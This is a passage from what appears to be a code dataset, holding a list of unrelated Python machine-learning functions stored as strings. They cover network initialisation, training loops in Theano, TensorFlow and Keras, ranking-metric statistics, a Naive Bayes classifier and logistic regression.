np.zeros((Dout,))\n Din = Dout\n if i < len(hidden_dims) - 1:\n Dout = hidden_dims[i+1]\n if i == len(hidden_dims) - 1:\n Dout = num_classes\n \n # BN params initialization\n if self.normalization != None:\n for i in range(self.num_layers - 1):\n self.params['gamma' + str(i+1)] = np.ones(shape=(hidden_dims[i]))\n self.params['beta' + str(i+1)] = np.zeros(shape=(hidden_dims[i]))\n\n # When using dropout we need to pass a dropout_param dictionary to each\n # dropout layer so that the layer knows the dropout probability and the mode\n # (train / test). You can pass the same dropout_param to each dropout layer.\n self.dropout_param = {}\n if self.use_dropout:\n self.dropout_param = {\"mode\": \"train\", \"p\": dropout}\n if seed is not None:\n self.dropout_param[\"seed\"] = seed\n\n # With batch normalization we need to keep track of running means and\n # variances, so we need to pass a special bn_param object to each batch\n # normalization layer. You should pass self.bn_params[0] to the forward pass\n # of the first batch normalization layer, self.bn_params[1] to the forward\n # pass of the second batch normalization layer, etc.\n self.bn_params = []\n if self.normalization == \"batchnorm\":\n self.bn_params = [{\"mode\": \"train\"} for i in range(self.num_layers - 1)]\n if self.normalization == \"layernorm\":\n self.bn_params = [{} for i in range(self.num_layers - 1)]\n\n # Cast all parameters to the correct datatype\n for k, v in self.params.items():\n self.params[k] = v.astype(dtype)", "def calc_std_nDCG_AP_corpus_smoothing(p):\n \n# nDCG_MAP_res = base_path +\"\\\\nDCG_MAP_res\\\\\"\n measures_res = linux_base_path+ \"/measures_res\"+setup+\"/\"\n k_val = 50\n NDCG_AP_all_claims_all_param_values = read_pickle(measures_res+\"NDCG_AP_prec_at_k_all_claims_all_param_values_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:clm,alpha_f,beta_f,k_val,lambda_f val nDCG_score,AP_score\n each_params_AVGnDCG_MAP_dict = read_pickle(measures_res+\"each_params_AVGnDCG_MAP_prec_at_k_dict_top_k_docs_\"+str(k_val)+\"_at_\"+str(p)) #key:alpha_f,beta_f,k_val,lambda_f\n nDCG_MAP_std = {} #key is a configuration quadruplet, value is the std of the measures\n \n \n \n# for k_val in top_k_docs_values:\n for alpha in range(0,11,1): #change just for test!\n for beta in range(0,10,1):\n for lambda_int in range(0,11,1):\n lambda_f = turn_to_float([lambda_int])\n (alpha_f,beta_f) = turn_to_float([alpha,beta])\n curr_AP_var = 0\n curr_nDCG_var = 0\n curr_prec_at_5_var = 0\n curr_prec_at_10_var = 0\n for clm in claim_list:\n curr_nDCG_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][0] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][0])**2\n curr_AP_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][1] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][1])**2\n curr_prec_at_5_var += (NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][2] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][2])**2\n curr_prec_at_10_var +=(NDCG_AP_all_claims_all_param_values[str(clm),alpha_f,beta_f,k_val,lambda_f][3] - each_params_AVGnDCG_MAP_dict[alpha_f,beta_f,k_val,lambda_f][3])**2\n curr_nDCG_std = float(float(math.sqrt(curr_nDCG_var))/float(len(claim_list)))\n curr_AP_std = float(float(math.sqrt(curr_AP_var))/float(len(claim_list)))\n curr_prec_at_5_std = float(float(math.sqrt(curr_prec_at_5_var))/float(len(claim_list)))\n curr_prec_at_10_std =float(float(math.sqrt(curr_prec_at_10_var))/float(len(claim_list)))\n nDCG_MAP_std[alpha_f,beta_f,k_val,lambda_f] = (curr_nDCG_std,curr_AP_std,curr_prec_at_5_std,curr_prec_at_10_std)\n save_pickle(measures_res+\"nDCG_MAP_prec_at_k_std_for_each_configuration_k_top_docs_\"+str(k_val)+\"_at_\"+str(p), nDCG_MAP_std)", "def _train_epoch(self, train_batches, dropout_keep_prob, data, batch_size, save_dir, save_prefix):\n pad_id = self.vocab.get_id(self.vocab.pad_token)\n total_num, total_loss = 0, 0\n log_every_n_batch, n_batch_loss = 50, 0\n eval_every_n_batch = (len(data.train_set) - 1) / (8 * batch_size)\n for bitx, batch in enumerate(train_batches, 1): \n feed_dict = {self.p: batch['passage_token_ids'],\n self.q: batch['question_token_ids'],\n self.pc: batch['passage_char_ids'],\n self.qc: batch['question_char_ids'],\n self.p_em: batch['passage_em'],\n self.p_pos: batch['passage_pos'],\n self.q_pos: batch['question_pos'],\n self.p_length: batch['passage_length'],\n self.q_length: batch['question_length'],\n self.start_label: batch['start_id'],\n self.end_label: batch['end_id'],\n self.pr: batch['passage_rank'],\n self.dropout_keep_prob: dropout_keep_prob}\n\n _, loss = self.sess.run([self.train_op, self.loss], \n feed_dict=feed_dict)\n\n total_loss += loss * len(batch['raw_data'])\n total_num += len(batch['raw_data'])\n n_batch_loss += loss\n if log_every_n_batch > 0 and bitx % log_every_n_batch == 0:\n self.logger.info('Average loss from batch {} to {} is {}'.format(\n bitx - log_every_n_batch + 1, bitx, n_batch_loss / log_every_n_batch))\n n_batch_loss = 0\n \n if eval_every_n_batch > 0 and bitx % eval_every_n_batch == 0:\n self.logger.info('Evaluating the model ...')\n if data.dev_set is not None:\n eval_batches = data.gen_mini_batches('dev', batch_size, pad_id, shuffle=False)\n eval_loss, bleu_rouge = self.evaluate(eval_batches)\n self.logger.info('Dev eval loss {}'.format(eval_loss))\n self.logger.info('Dev eval result: {}'.format(bleu_rouge))\n\n if bleu_rouge['ROUGE-L'] > self.max_rouge_l:\n self.save(save_dir, save_prefix)\n self.max_rouge_l = bleu_rouge['ROUGE-L']\n else:\n self.logger.warning('No dev set is loaded for evaluation in the dataset!')\n\n return 1.0 * total_loss / total_num", "def __init__(self,\n dataset='mnist.pkl.gz',\n nkerns=[20, 50], batch_size=500, update_rule = 'regular', config=None, dropout=0, activation='tanh'):\n if activation=='tanh':\n activation_fn = T.tanh\n # Set activation function to none because with PreLU additional alpha variables have to be initialized\n # by setting the activation function to None the linear activation will be retrieved which then can be\n # activated by my PreLU implementation\n elif activation=='PreLU':\n activation_fn = None\n\n rng = numpy.random.RandomState(23455)\n\n datasets = load_data(dataset)\n\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n\n # compute number of minibatches for training, validation and testing\n n_train_batches = train_set_x.get_value(borrow=True).shape[0]\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]\n n_test_batches = test_set_x.get_value(borrow=True).shape[0]\n n_train_batches //= batch_size\n n_valid_batches //= batch_size\n n_test_batches //= batch_size\n self.n_train_batches = n_train_batches\n self.n_valid_batches = n_valid_batches\n self.n_test_batches = n_test_batches\n self.loss_history = []\n self.val_error_history = []\n self.train_error_history = []\n # allocate symbolic variables for the data\n\n index = T.lscalar() # index to a [mini]batch\n mode = T.lscalar() # 1 = training (dropout enabled), 0 = testing (dropout disabled)\n\n # start-snippet-1\n x = T.matrix('x') # the data is presented as rasterized images\n y = T.ivector('y') # the labels are presented as 1D vector of\n # [int] labels\n\n ######################\n # BUILD ACTUAL MODEL #\n ######################\n print('... building the model')\n\n # Reshape matrix of rasterized images of shape (batch_size, 28 * 28)\n # to a 4D tensor, compatible with our LeNetConvPoolLayer\n # (28, 28) is the size of MNIST images.\n layer0_input = x.reshape((batch_size, 1, 28, 28))\n\n # Construct the first convolutional pooling layer:\n # filtering reduces the image size to (28-5+1 , 28-5+1) = (24, 24)\n # maxpooling reduces this further to (24/2, 24/2) = (12, 12)\n # 4D output tensor is thus of shape (batch_size, nkerns[0], 12, 12)\n layer0 = LeNetConvPoolLayer(\n rng,\n input=layer0_input,\n image_shape=(batch_size, 1, 28, 28),\n filter_shape=(nkerns[0], 1, 5, 5),\n poolsize=(2, 2),\n activation = activation_fn\n )\n if(activation=='PreLU'):\n ########################\n # PreLU Implementation #\n ########################\n # if the activation function is PreLU alpha has to be initialized with the same shape as the bias\n # alpha will be initialized at 0.25 as suggested in the article that introduced PreLU\n # Reference: Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification\n # (Kaiming He; Xiangyu Zhang; Shaoqing Ren; Jian Sun, Microsoft, 2015)\n alpha0 = theano.shared(numpy.ones(layer0.b.get_value().shape,dtype=theano.config.floatX)*0.25, borrow=True)\n layer1_input = self.PreLU(layer0.output, alpha0.dimshuffle('x', 0, 'x', 'x'))\n else:\n layer1_input = layer0.output\n\n # Construct the second convolutional pooling layer\n # filtering reduces the image size to (12-5+1, 12-5+1) = (8, 8)\n # maxpooling reduces this further to (8/2, 8/2) = (4, 4)\n # 4D output tensor is thus of shape (batch_size, nkerns[1], 4, 4)\n layer1 = LeNetConvPoolLayer(\n rng,\n input=layer1_input,\n image_shape=(batch_size, nkerns[0], 12, 12),\n filter_shape=(nkerns[1], nkerns[0], 5, 5),\n poolsize=(2, 2),\n activation = activation_fn\n )\n if (activation == 'PreLU'):\n alpha1 = theano.shared(numpy.ones(layer1.b.get_value().shape, dtype=theano.config.floatX) * 0.25,\n borrow=True)\n layer1_output = self.PreLU(layer1.output, alpha1.dimshuffle('x', 0, 'x', 'x'))\n else:\n layer1_output = layer1.output\n\n # the HiddenLayer being fully-connected, it operates on 2D matrices of\n # shape (batch_size, num_pixels) (i.e matrix of rasterized images).\n # This will generate a matrix of shape (batch_size, nkerns[1] * 4 * 4),\n # or (500, 50 * 4 * 4) = (500, 800) with the default values.\n layer2_input = layer1_output.flatten(2)\n\n # Add dropout if dropout value is higher than 0 and in training mode\n if(dropout>0):\n layer2_input = theano.ifelse.ifelse(theano.tensor.eq(mode, 1), self.Dropout(layer2_input, dropout, rng), layer2_input)\n\n layer2 = HiddenLayer(\n rng,\n input=layer2_input,\n n_in=nkerns[1] * 4 * 4,\n n_out=500,\n activation=activation_fn\n )\n if (activation == 'PreLU'):\n alpha2 = theano.shared(numpy.ones(layer2.b.get_value().shape, dtype=theano.config.floatX) * 0.25,\n borrow=True)\n layer2_output = self.PreLU(layer2.output, alpha2)\n else:\n layer2_output = layer2.output\n\n # Add dropout if dropout value is higher than 0 and in training mode\n if (dropout > 0):\n layer3_input = theano.ifelse.ifelse(theano.tensor.eq(mode, 1), self.Dropout(layer2_output, dropout, rng),\n layer2_output)\n else:\n layer3_input = layer2_output\n\n # classify the values of the fully-connected sigmoidal layer\n layer3 = LogisticRegression(input=layer3_input, n_in=500, n_out=10)\n\n # the cost we minimize during training is the NLL of the model\n cost = layer3.negative_log_likelihood(y)\n #self.print_output = theano.function(\n # [index],\n # [alpha0.dimshuffle('x',0,'x','x'), layer0.b, layer0.output],\n # givens={\n # x: test_set_x[index * batch_size: (index + 1) * batch_size],\n # },\n # on_unused_input='ignore'\n #)\n self.print_layer2 = theano.function(\n [index],\n layer2_input,\n givens={\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\n mode: 1\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n # create a function to compute the mistakes that are made by the model\n self.test_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\n y: test_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 0\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n\n self.validate_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: valid_set_x[index * batch_size: (index + 1) * batch_size],\n y: valid_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 0\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n self.train_error_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 0\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n\n # create a list of all model parameters to be fit by gradient descent\n params = layer3.params + layer2.params + layer1.params + layer0.params\n\n if activation == 'PreLU':\n alpha = [alpha0, alpha1, alpha2]\n params += alpha\n # create a list of gradients for all model parameters\n grads = T.grad(cost, params)\n\n # train_model is a function that updates the model parameters by\n # SGD Since this model has many parameters, it would be tedious to\n # manually create an update rule for each model parameter. We thus\n # create the updates list by automatically looping over all\n # (paras[i], grads[i]) pairs.\n if update_rule=='regular':\n if(config is None) : config = {}\n config.setdefault('learning_rate', 0.1)\n updates = [\n (param, param - 0.1 * grad)\n for param, grad in zip(params, grads)\n ]\n ###########################\n # AdaDelta implementation #\n ###########################\n # Implementing the adaDelta update rule as described in AdaDelta: An adaptive learning rate method\n # (Matthew D. Zeiler, Google, 2012)\n elif update_rule=='adaDelta':\n\n if(config is None): config = {}\n config.setdefault('decay_rate',0.95)\n config.setdefault('epsilon',1e-6)\n config.setdefault('learning_rate', 1.)\n \n # E(g^2) is a Theano variable to store the moving average of the squared gradient\n Egrads = [\n theano.shared(numpy.zeros_like(param.get_value(),dtype=theano.config.floatX),borrow=True)\n for param in params\n ]\n # E(dx^2) is a Theano variable to store the moving average of the squared updates to the parameters\n Edxs = [\n theano.shared(numpy.zeros_like(param.get_value(),dtype=theano.config.floatX),borrow=True)\n for param in params\n ]\n # The updated E(g^2) value is calculated and will be added to the parameter updates\n Egrads_new = [\n config['decay_rate'] * Egrad + (1 - config['decay_rate']) * (grad ** 2)\n for (Egrad, grad) in zip(Egrads, grads)\n ]\n # The parameter update is calculated using the AdaDelta update rule\n dxs = [\n -(T.sqrt(Edx + config['epsilon']) / T.sqrt(Egrad_new + config['epsilon'])) * grad\n for (Edx, Egrad_new, grad) in zip(Edxs, Egrads_new, grads)\n ]\n # The updated E(dx^2) value is calculated and will be added to the parameter updates\n Edxs_new = [\n config['decay_rate']*Edx + (1-config['decay_rate']) * (dx ** 2)\n for (Edx, dx) in zip(Edxs, dxs)\n ]\n Egrads_updates = zip(Egrads, Egrads_new)\n Edxs_updates = zip(Edxs, Edxs_new)\n param_updates = [\n (param, param+dx)\n for (param, dx) in zip(params, dxs)\n ]\n # The new E(g^2) and E(dx^2) are added to the parameter updates so they will be updated at the same time\n # as the model parameters.\n updates = param_updates + Egrads_updates + Edxs_updates\n\n else:\n raise ValueError('Unrecognized update rule %s' % update_rule)\n self.train_model = theano.function(\n [index],\n cost,\n updates=updates,\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size],\n mode: 1 # in training mode dropout is enabled (if dropout>0)\n },\n on_unused_input = 'ignore' # if dropout<0 the 'mode' variable will be unused\n )\n\n # end-snippet-1\n\n ###############\n # TRAIN MODEL #\n ###############", "def _evaluate_during_fit(self, test_loader, epoch):", "def BatchNorm(X): # (X - mu) / sigma -> Have to implement trainable parameters gamma and beta on this\n epsilon = 0.001 # To prevent overflow and ensure numerical stability\n bn = (X - torch.mean(X)) / (torch.std(X)+epsilon)\n sigma.append(torch.std(X)+epsilon)\n return bn", "def compute_means(opts, train_data, sampler):\n exp_names = train_data[\"exp_names\"].value\n means = []\n stds = []\n if opts[\"flags\"].normalize is True:\n running_stats = []\n # a running stat for each channel\n running_stats = RunningStats(3)\n # loop over the experiments\n\n # for exp_name in exp_names:\n for j in range(0, len(exp_names), 2):\n batch = sampler.get_minibatch()\n exp_name = batch[2][0]\n print(exp_name)\n # loop over the keys\n\n seq_len = train_data[\"exps\"][exp_name][\"labels\"].shape[0]\n temp_feat = batch[0].cpu().numpy()\n temp_feat = temp_feat[:seq_len, :, :, :]\n\n channel_feats = []\n for i in range(3):\n # channel_feat = temp_feat[0, :, i, :]\n # sample frames\n channel_feat = temp_feat[::100, i, :]\n channel_feat = channel_feat.reshape(-1, 1)\n channel_feats.append(channel_feat)\n\n channel_feats = np.concatenate(channel_feats, axis=1)\n running_stats.add_data(\n channel_feat\n )\n\n means = running_stats.mean.tolist()\n stds = running_stats.compute_std().tolist()\n else:\n means = [.5, .5, .5]\n stds = [1, 1, 1]\n # for key in opts[\"flags\"].feat_keys:\n # temp_feat = train_data[\"exps\"][exp_names[0]][key].value\n # mean = np.zeros((temp_feat.shape[2], ))\n # std = np.ones((temp_feat.shape[2], ))\n # means.append(mean)\n # stds.append(std)\n normalize = transforms.Normalize(mean=means,\n std=stds)\n\n return normalize", "def classify():\n yes_dataset = df[df[\"_class\"] == 1] # 470588\n no_dataset = df[df[\"_class\"] == 0] # 1971\n\n parameter_analysis = list()\n for criterion in np.arange(0.05, 0.91, 0.05):\n print(\"doing experiment at criterion = %s ...\" % criterion)\n rate_list = list()\n for i in range(10):\n # shuffle yes_dataset and no_dataset, so we can randomly choose 90% yes_dataset\n # + 90% no_dataset as train dataset, 10% yes_dataset + 10% no_dataset as test dataset\n yes_index = yes_dataset.index.tolist()\n random.shuffle(yes_index)\n no_index = no_dataset.index.tolist()\n random.shuffle(no_index)\n \n # concatenate 90%yes + 90%no, 10%yes + 10%no\n train = pd.concat([\n yes_dataset.loc[yes_index[:1774], :],\n no_dataset.loc[no_index[:423530], :]\n ])\n test = pd.concat([\n yes_dataset.loc[yes_index[1774:], :],\n no_dataset.loc[no_index[423530:], :]\n ]) \n \n # split data and label\n train_data, train_label = (train[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n train[\"_class\"])\n test_data, test_label = (test[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n test[\"_class\"])\n \n # apply classifier\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n probability = clf.predict_proba(test_data).T[1]\n \n result = pd.DataFrame()\n result[\"_class\"] = test_label\n result[\"_predict\"] = probability >= criterion\n \n result_yes = result[result[\"_class\"] == 1]\n yes_yes_rate = sum(result_yes[\"_class\"] == result_yes[\"_predict\"])/len(result_yes[\"_predict\"])\n \n result_no = result[result[\"_class\"] == 0]\n no_no_rate = sum(result_no[\"_class\"] == result_no[\"_predict\"])/len(result_no[\"_predict\"])\n \n rate_list.append((yes_yes_rate, no_no_rate))\n\n rate_list = pd.DataFrame(rate_list)\n yes_yes_rate, no_no_rate = rate_list.mean()[0], rate_list.mean()[1]\n parameter_analysis.append((criterion, yes_yes_rate, no_no_rate))\n \n # save data to excel spreadsheet\n parameter_analysis = pd.DataFrame(parameter_analysis, columns=[\"criterion\", \"yes_yes_rate\", \"no_no_rate\"])\n writer = pd.ExcelWriter(\"parameter_analysis.xlsx\")\n parameter_analysis.to_excel(writer, \"parameter_analysis\", index=False)\n writer.save()", "def estimate_nb(x,y,smoothing):\n\n raise NotImplementedError", "def _fit(self):\n loss = 1e10\n weights = self._init_weights\n while loss > self._converge_epsilon:\n d_F = 2 * (self._input.t() * self._input *\n weights - self._input.t() * self._label)\n dd_F = 2 * self._input.t() * self._input\n weights = weights - dd_F.inv() * d_F\n loss = self._mse(weights)\n print('Error : {}'.format(loss))\n return weights", "def evaluate(self, train_set, test_set, shuffle_batch=True,\n epochs=25, lr_decay=0.95, sqr_norm_lim=9,labels=None,model=None): \n cost = self.negative_log_likelihood(self.y) \n dropout_cost = self.dropout_negative_log_likelihood(self.y)\n # adadelta upgrades: dict of variable:delta\n grad_updates = self.sgd_updates_adadelta(dropout_cost, lr_decay, 1e-6, sqr_norm_lim)\n # shuffle dataset and assign to mini batches.\n # if dataset size is not a multiple of batch size, replicate \n # extra data (at random)\n np.random.seed(3435)\n batch_size = self.batch_size\n if train_set.shape[0] % batch_size > 0:\n extra_data_num = batch_size - train_set.shape[0] % batch_size\n #extra_data = train_set[np.random.choice(train_set.shape[0], extra_data_num)]\n perm_set = np.random.permutation(train_set) \n extra_data = perm_set[:extra_data_num]\n new_data = np.append(train_set, extra_data, axis=0)\n else:\n new_data = train_set\n \n shuffled_data = np.random.permutation(new_data) # Attardi\n n_batches = shuffled_data.shape[0]/batch_size\n # divide train set into 90% train, 10% validation sets\n n_train_batches = int(np.round(n_batches*0.8))\n n_val_batches = n_batches - n_train_batches\n train_set = shuffled_data[:n_train_batches*batch_size,:]\n val_set = shuffled_data[n_train_batches*batch_size:,:] \n # push data to gpu \n # the dataset has the format [word_indices,padding,user,label]\n train_set_x, train_set_y = shared_dataset(train_set[:,:-2], train_set[:,-1]) \n train_set_u = theano.shared(np.asarray(train_set[:,-2],dtype='int32')) \n # val_set_x = val_set[:,:-2]\n # val_set_u = val_set[:,-2]\n # val_set_y = val_set[:,-1]\n val_set_x, val_set_y = shared_dataset(val_set[:,:-2], val_set[:,-1])\n val_set_u = theano.shared(np.asarray(val_set[:,-2],dtype='int32')) \n test_set_x = test_set[:,:-2]\n test_set_u = test_set[:,-2]\n test_set_y = test_set[:,-1] \n batch_start = self.index * batch_size\n batch_end = batch_start + batch_size\n\n # compile Theano functions to get train/val/test errors\n \n \n test_y_pred = self.predict(test_set_x,test_set_u)\n test_error = T.mean(T.neq(test_y_pred, self.y))\n # errors on train set\n if self.Users is not None:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]\n },\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end], \n self.u: val_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.u, self.y], test_error, allow_input_downcast=True)\n else:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.y], test_error, allow_input_downcast=True)\n\n # start training over mini-batches\n print 'training...' \n best_val_perf = 0\n test_perf = 0 \n patience = 5\n drops = 0\n prev_val_perf = 0 \n for epoch in xrange(epochs):\n start_time = time.time()\n # FIXME: should permute whole set rather than minibatch indexes\n if shuffle_batch:\n for minibatch_index in np.random.permutation(range(n_train_batches)):\n cost_epoch = train_model(minibatch_index)\n self.set_zero(self.zero_vec) # CHECKME: Why?\n else:\n for minibatch_index in xrange(n_train_batches):\n cost_epoch = train_model(minibatch_index) \n self.set_zero(self.zero_vec)\n train_losses = [train_error(i) for i in xrange(n_train_batches)]\n train_perf = 1 - np.mean(train_losses)\n val_losses = [val_model(i) for i in xrange(n_val_batches)]\n val_perf = 1 - np.mean(val_losses) \n info = 'epoch: %i\\%i (%.2f secs) train acc: %.2f %% | val acc: %.2f %%' % (\n epoch,epochs, time.time()-start_time, train_perf * 100., val_perf*100.) \n # from ipdb import set_trace; set_trace()\n if val_perf > prev_val_perf: \n drops=0\n if val_perf >= best_val_perf:\n best_val_perf = val_perf\n info+= \" **\"\n if model:\n # print \"save model\"\n self.save(model)\n if self.Users is not None:\n test_loss = test_model(test_set_x, test_set_u, test_set_y)\n else:\n test_loss = test_model(test_set_x, test_set_y)\n test_perf = 1 - test_loss \n else: \n drops+=1\n if drops >= patience:\n print \"Ran out of patience...\"\n break\n prev_val_perf = val_perf\n print info\n # set_trace() \n return test_perf", "def test_generate_nb(self):\n pass", "def binlogreg_train(X, Y_):\n N = X.shape[0]\n\n w = np.random.randn(X.shape[1], 1) # D x 1\n b = np.random.randn(N, 1) # N x 1\n\n for i in range(PARAM_NITER+1):\n # klasifikacijski rezultati\n scores = np.dot(X, w) + b # N x 1\n\n # vjerojatnosti razreda c_1\n probs = sigmoid(scores, y=1) # N x 1\n\n # gubitak\n loss = -1 * float(np.dot(Y_.T, np.log(probs))) # scalar\n\n # dijagnostički ispis\n if i % 10 == 0:\n print(\"iteration {}: loss {}\".format(i, loss))\n\n # if i % 1000 == 0:\n # Y = np.around(probs, decimals=0)\n # decfun = binlogreg_decfun(w, b)\n # bbox = (np.min(X, axis=0), np.max(X, axis=0))\n # data.graph_surface(decfun, bbox, offset=0.5)\n # data.graph_data(X, Y_, Y)\n\n # derivacije gubitka po klasifikacijskom rezultatu\n dL_dscores = np.subtract(probs, Y_) # N x 1\n\n # gradijenti parametara\n grad_w = np.divide(np.dot(X.T, dL_dscores), N) # D x 1\n grad_b = np.divide(np.sum(dL_dscores), N) # 1 x 1\n\n # poboljšani parametri\n w += -PARAM_DELTA * grad_w\n b += -PARAM_DELTA * grad_b\n\n return w, b", "def retr_metr(gdat, indxvaluthis=None, strgvarbthis=None):\n\n metr = np.zeros((gdat.numbepoc, 2, 3 )) - 1\n\n loss = np.empty(gdat.numbepoc)\n numbepocchec = 5\n \n print gdat.modl.summary()\n for y in gdat.indxepoc:\n print 'Training epoch %d...' % y\n histinpt = gdat.inpttran[:, :, None]\n hist = gdat.modl.fit(histinpt, gdat.outptran, epochs=1, batch_size=gdat.numbdatabtch, verbose=1)\n loss[y] = hist.history['loss'][0]\n indxepocloww = max(0, y - numbepocchec)\n \n for layr in gdat.modl.layers:\n func = keras.backend.function([gdat.modl.input, keras.backend.learning_phase()], [layr.output])\n \n listweigbias = layr.get_weights()\n #assert len(listweigbias) == 2\n print 'listweigbias'\n for n in range(len(listweigbias)):\n print 'n'\n print n\n print 'listweigbias[n]'\n summgene(listweigbias[n])\n stat = func([histinpt, 1.])\n print 'type(stat)'\n print type(stat)\n print 'len(stat)'\n print len(stat)\n for n in range(len(stat)):\n print 'stat[n]'\n summgene(stat[n])\n print\n print\n\n\n if y == gdat.numbepoc - 1 and 100. * (loss[indxepocloww] - loss[y]):\n print 'Warning! The optimizer may not have converged.'\n print 'loss[indxepocloww]\\n', loss[indxepocloww], '\\nloss[y]\\n', loss[y], '\\nloss\\n', loss\n\n for r in gdat.indxrtyp:\n if r == 0:\n inpt = gdat.inpttran\n outp = gdat.outptran\n numdatatemp = gdat.numbdatatran\n else:\n inpt = gdat.inpttest\n outp = gdat.outptest\n numbdatatemp = gdat.numbdatatest\n inpt = inpt[:, :, None]\n \n outppredsigm = gdat.modl.predict(inpt)\n outppred = (outppredsigm > 0.5).astype(int)\n matrconf = confusion_matrix(outp, outppred)\n if matrconf.size == 1:\n matrconftemp = np.copy(matrconf)\n matrconf = np.empty((2, 2))\n matrconf[0, 0] = matrconftemp\n trne = matrconf[0, 0]\n flpo = matrconf[0, 1]\n flne = matrconf[1, 0]\n trpo = matrconf[1, 1]\n \n if float(trpo + flpo) > 0:\n metr[y, r, 0] = trpo / float(trpo + flpo) # precision\n else:\n pass\n #print ('No positive found...')\n #raise Exception('')\n metr[y, r, 1] = float(trpo + trne) / (trpo + flpo + trne + flne) # accuracy\n if float(trpo + flne) > 0:\n metr[y, r, 2] = trpo / float(trpo + flne) # recall\n else:\n print 'No relevant sample!'\n #raise Exception('')\n \n print 'metr[y, r, :]'\n print metr[y, r, :]\n print \n return metr", "def SP_init(train_data, test_data, n_cols, n_proxim_con, perm_thresh, perm_inc, perm_dec, min_overlap, n_winners, beta_boost, T_boost_speed, verbose, pixel_size):\n\n if(pixel_size == None):\n pixel_size = 28\n\n # Load MNIST data input_size (aka nn) of 256 or 1024\n input_size = len(train_data[1])\n # print(len(train_data[1]))\n\n # Initialize synapses and permanence arrays\n syn_index = np.random.randint(0, input_size, (n_cols, n_proxim_con))\n syn_array = np.zeros((n_cols, input_size), dtype=int)\n # syn_array[syn_index] = 1\n\n # Synapses array\n for i in range(n_cols):\n syn_array[i, syn_index[i]] = 1\n\n # syn_array = np.random.randint(0, 2, (n_cols, input_size))\n perm_array = np.random.uniform(0, 1, (n_cols, input_size))\n perm_array = syn_array * perm_array\n\n # Initialize empty SDR array\n # overlap_scores = np.zeros([1, n_cols])\n sdr_train_array = np.zeros((len(train_data), n_cols), dtype=int)\n sdr_test_array = np.zeros((len(test_data), n_cols), dtype=int)\n\n # Initialize empty boosting arrays; time-averaged activation level\n time_avg_act = np.zeros([1, n_cols])\n prev_time_avg_act = np.zeros([1, n_cols])\n boosting = np.ones([1, n_cols])\n\n # Initialize metric arrays\n sparse_train_array = np.zeros(([len(train_data), 1]))\n sparse_test_array = np.zeros(([len(test_data), 1]))\n\n # Main code\n train_en = True\n for epoch in range(0, 2):\n input_set = train_data\n if train_en == False:\n input_set = test_data\n\n for iter in range(0, len(input_set)):\n # Calculate overlap scores\n overlap_scores = np.dot((syn_array * (perm_array >= perm_thresh)), input_set[iter, :].transpose()) \\\n * boosting\n\n # Initialize SDR (activations of cols)\n sdr = np.zeros(([1, n_cols]), dtype=int)\n\n # Select the winners\n for i in range(n_winners):\n win_val = np.max(overlap_scores)\n win_index = np.argmax(overlap_scores)\n if(win_val >= min_overlap):\n sdr[0, win_index] = 1\n overlap_scores[0, win_index] = 0\n\n #num_wins = sum(sdr)\n #print('This is num_wins')\n #print(num_wins)\n\n # Calculating activation level current and then previous, a_bar(t) and a_bar(t-1)\n if iter >= T_boost_speed:\n time_avg_act = ((T_boost_speed - 1) * prev_time_avg_act + sdr) / T_boost_speed\n prev_time_avg_act = time_avg_act\n\n # Calculating mini column neighborhood\n recent_act = (1/abs(n_cols)) * np.sum(time_avg_act)\n\n # Calculate boosting for next time\n boosting = np.exp(-beta_boost * (time_avg_act - recent_act))\n\n if(train_en == 